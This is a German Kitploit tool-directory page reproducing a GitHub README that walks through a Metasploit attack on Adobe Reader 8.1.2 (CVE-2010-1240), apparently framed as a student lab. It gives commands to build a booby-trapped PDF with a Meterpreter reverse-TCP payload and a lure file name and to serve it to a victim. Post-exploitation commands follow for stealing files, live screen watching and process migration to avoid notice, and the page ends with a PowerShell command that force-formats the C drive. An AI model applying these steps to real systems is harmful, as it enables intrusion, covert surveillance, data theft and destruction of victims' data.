Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Embedded-Backdoor-Connection — Dieses Demonstrationsvideo zeigt, wie wir das Gerät des Opfers kontrollieren können, indem wir die harmlos aussehende PDF-Datei an das Ziel senden, die tatsächlich einen eingebetteten Payload enthält. Der Exploit wurde als CVE-2010-1240 veröffentlicht. | Kitploit
Tools/GitHubGitHub/omarothmann/embedded-backdoor-connection
Phishing-ToolsPayload-GenerierungExploitationPost-ExploitationPenetrationstestsCommand and ControlLernen & BildungLabs & Praxis

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
GitHub
omarothmann/embedded-backdoor-connection

Embedded-Backdoor-Connection

Dieses Demonstrationsvideo zeigt, wie wir das Gerät des Opfers kontrollieren können, indem wir die harmlos aussehende PDF-Datei an das Ziel senden, die tatsächlich einen eingebetteten Payload enthält. Der Exploit wurde als CVE-2010-1240 veröffentlicht.

Repository anzeigen
84vor 4 JahrenNoch nicht geprüft

Eingebettete Hintertür-Verbindung über PDF-Dateien 😈

präsentiert von    

Einleitung

Dieses Demonstrationsvideo zeigt, wie wir das Gerät des Opfers kontrollieren können, indem wir die harmlos aussehende PDF-Datei an das Ziel senden, die tatsächlich eine eingebettete Nutzlast enthält. Der Exploit wurde als CVE-2010-1240 veröffentlicht.

Sobald die PDF-Datei im Adobe Reader geöffnet wird, lassen die Benutzer, die von uns getäuscht werden, den Sicherheits-Pop-ups zuzustimmen, uns eine Meterpreter-Sitzung erlangen, die über eine reverse TCP-Verbindung mit ihren Geräten verbunden ist. Bis dahin sind alle ihre Daten und was sie gerade tun, unter unserer Überwachung.

Hehe~Boi

Liste der Software/Werkzeuge

  • Metasploit
  • Adobe Reader <= 8.1.2

Umgebung

Kali Linux         Windows 7 or 10         Adobe Reader        

  • Angreifer-Maschine: Kali Linux Version 2021.1
  • Ziel-Betriebssystem: Windows 10 (x86) oder Windows 7 (x86)
  • Ziel-Software: Adobe Reader 8.1.2

Detaillierte Schritte

Zuerst starten wir die MSFconsole, die uns eine Befehlszeilenschnittstelle bietet, um auf das Metasploit-Framework zuzugreifen.

root@kitploit:~
msfconsole

Dann suchen wir nach einem Exploit, der auf unsere Ziel-Windows-Plattform und Adobe PDF Reader passt, wobei eine ganze Liste von Exploits angezeigt wird, die verwendet werden können, um in den Windows-Rechner des Opfers einzudringen und die Adobe PDF Reader-Sicherheitslücken auszunutzen.

root@kitploit:~
search type:exploit platform:windows adobe pdf

Bei dieser Ausnutzung wählen und verwenden wir das Modul "adobe_pdf_embedded_exe" mit dem folgenden Befehl, um das Ziel des Eindringens in das Opfer zu erreichen.

root@kitploit:~
use exploit/windows/fileformat/adobe_pdf_embedded_exe

Wir können auch die Informationen des Exploits mit dem Befehl „info“ überprüfen, wie unten gezeigt:

root@kitploit:~
info

Dann setzen wir den Payload so, dass er eine reverse TCP-Verbindung verwendet. Wir verwenden auch den Meterpreter, der eine interaktive Shell bereitstellt, die es uns erleichtert, alle Arten von Funktionen zu nutzen, indem wir Code einfügen und ausführen, um den Rechner des Opfers zu erkunden.

root@kitploit:~
set payload windows/meterpreter/reverse_tcp

Dann legen wir den Listening-Host und -Port fest. Für LHOST müssen wir die IP-Adresse der Angreifer-Maschine eingeben, die in diesem Fall die IP-Adresse unserer Kali-Maschine ist (10.0.2.4)*.

  • *p.s.
    • Sie müssen Ihre eigene Kali-Maschinen-IP verwenden
    • Sie können eine andere Portnummer verwenden

Für LPORT liegt es an uns, eine Portnummer festzulegen, die nicht häufig verwendet wird.

root@kitploit:~
# to check Kali machine’s IP address
ifconfig

set LHOST *10.0.2.4*
set LPORT 5665

Dann setzen wir die Eingabedatei für die Basis der PDF-Datei mit dem INFILENAME*-Flag. Als nächstes setzen wir den Dateinamen auf etwas, das das Interesse des Opfers weckt, die bösartige PDF-Datei zu öffnen.

  • *p.s.
    • Sie müssen sicherstellen, dass Ihr PDF-Dateipfad korrekt ist
    • Sie können einen anderen Dateinamen verwenden
root@kitploit:~
set INFILENAME '/home/kali/Documents/WIC3004Assignment.pdf'
set FILENAME 'Bawang_Ranger_WIC3004Report.pdf'

Wir können unsere Optionen noch einmal anzeigen, bevor wir den Befehl „exploit“ eingeben, um den Payload zusammen mit der PDF-Datei zu generieren.

root@kitploit:~
# Then we can show the info or options by
show info | show options

exploit

Sobald wir die PDF-Datei generiert haben, verschieben wir die Datei nach /var/www/html, dem Verzeichnis unserer Kali-Maschine, um den Webanwendungsserver zu hosten, damit unser Opfer die PDF-Datei später herunterladen kann.

  • Hinweis:
    • Wenn Sie einen anderen Dateinamen festgelegt haben, stellen Sie sicher, dass Sie den richtigen Pfad kopieren!
root@kitploit:~
sudo mv /home/kali/.msf4/local/Bawang_Ranger_WIC3004Report.pdf /var/www/html

Dann werden wir zum Einrichten unseres Listeners "exploit/multi/handler" verwenden. Wieder legen wir den Payload, LHOST und LPORT entsprechend dem fest, was wir bei der Generierung der bösartigen PDF-Datei definiert haben. Dann führen wir den Payload aus.

  • Hinweis:
    • LHOST: Bitte beachten Sie die IP-Adresse Ihrer eigenen Kali-Maschine
    • LPORT: Wenn Sie eine andere Portnummer festgelegt haben, stellen Sie sicher, dass Sie die Nummer korrekt eingeben
    • show info or show options ist ein optionaler Befehl.
      • Das Ausführen dient nur zur Überprüfung dessen, was Sie gerade eingestellt haben.
root@kitploit:~
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.0.2.4
set LPORT 5665
[show info | show options]
run

In einem anderen Terminal überprüfen wir den Status des Apache-Servers, um sicherzustellen, dass er läuft, um unsere PDF-Datei in /var/www/html zu hosten, damit das Opfer die Datei herunterladen kann.

root@kitploit:~
service apache2 status

# If it is inactive, start the service
service apache2 start

Öffnen Sie auf dem Windows-Rechner einen beliebigen Browser wie Chrome und geben Sie unsere Kali-IP (10.0.2.4)* ein, um auf den Webanwendungsserver der Kali-Maschine zuzugreifen.

*Hinweis: Bitte beachten Sie die IP-Adresse Ihrer eigenen Kali-Maschine

Dann simulieren Sie, dass ein Benutzer die gewünschte PDF-Datei speichert.

Sobald die Datei vom Opfer in Adobe Reader 8.1.2 geöffnet wird und es den Sicherheitsabfragen zustimmt, können wir auf unserer Kali-Maschine beobachten, dass eine neue Sitzung über eine reverse TCP-Verbindung hergestellt wurde.

Im realen Szenario werden wir eine Website mit der eingebetteten Payload-PDF einrichten, damit das Opfer die Datei herunterladen oder per E-Mail anhängen kann.


Ergebnis der Ausnutzung

Dann können wir remote auf den Rechner des Opfers zugreifen und weitere schädliche Aktionen durchführen, die wir in der Meterpreter-Sitzung wünschen.

Um eine Liste der Dinge anzuzeigen, die wir tun können

root@kitploit:~
help

Aktuelles Verzeichnis auflisten

root@kitploit:~
pwd

Dateien in diesem Verzeichnis auflisten

root@kitploit:~
ls

Ordner oder Datei vom Opfer-Rechner herunterladen

Zum Beispiel gibt es eine Datei namens password.txt, wir können den Befehl download password.txt ausführen

root@kitploit:~
download [folder name | filename with extension]

Datei auf dem Opfer-Rechner erstellen

Natürlich können wir ein bösartiges Skript schreiben (Hintertür einpflanzen), um uns dauerhaft mit dem Windows-Rechner zu verbinden, wenn wir wirklich böse sind! 💀

root@kitploit:~
   # Boot command prompt at background
   execute -f cmd.exe -H -i
   
   # Create file on Windows
   echo "You have been hacked" > hack.txt    

Mit Windows interagieren

root@kitploit:~
   #open the txt file we have just created
   hack.txt

   # Take screenshot
   screenshot
   
   # Watch the remote user in real time
   screenshare

Zusätzlich

Der Angreifer kann jedoch den Verdacht verringern, indem er den Meterpreter-Prozess auf einen anderen migriert, indem er das Migrate-Modul in der Meterpreter-Sitzung verwendet.

root@kitploit:~
meterpreter> run post/windows/manage/migrate

Hierdurch wird automatisch ein neuer Prozess auf dem Rechner des Opfers erzeugt, zu dem er migriert. Das Opfer könnte dann die infizierte PDF-Datei löschen, völlig ahnungslos, dass der Prozess bereits woanders hingewandert ist.

Der Angreifer kann weiterhin ein bösartiges Skript auf dem Zielrechner mit der Eingabeaufforderung (cmd) oder PowerShell erstellen, das das gesamte Betriebssystem zum Absturz bringen kann, sodass es nicht mehr richtig funktioniert.

root@kitploit:~
meterpreter> shell 
root@kitploit:~
# Start the Windows PowerShell
powershell

#Powershell command to forcefully format the C drive clean.
New-Partition -DiskNumber 1 -UseMaximumSize -AssignDriveLetter C| Format-Volume -DriveLetter C -FileSystemLabel "New"-FileSystem NTFS -Full -Force -Confirm:$false

Demonstrationsvideo

Demo

Tool herunterladen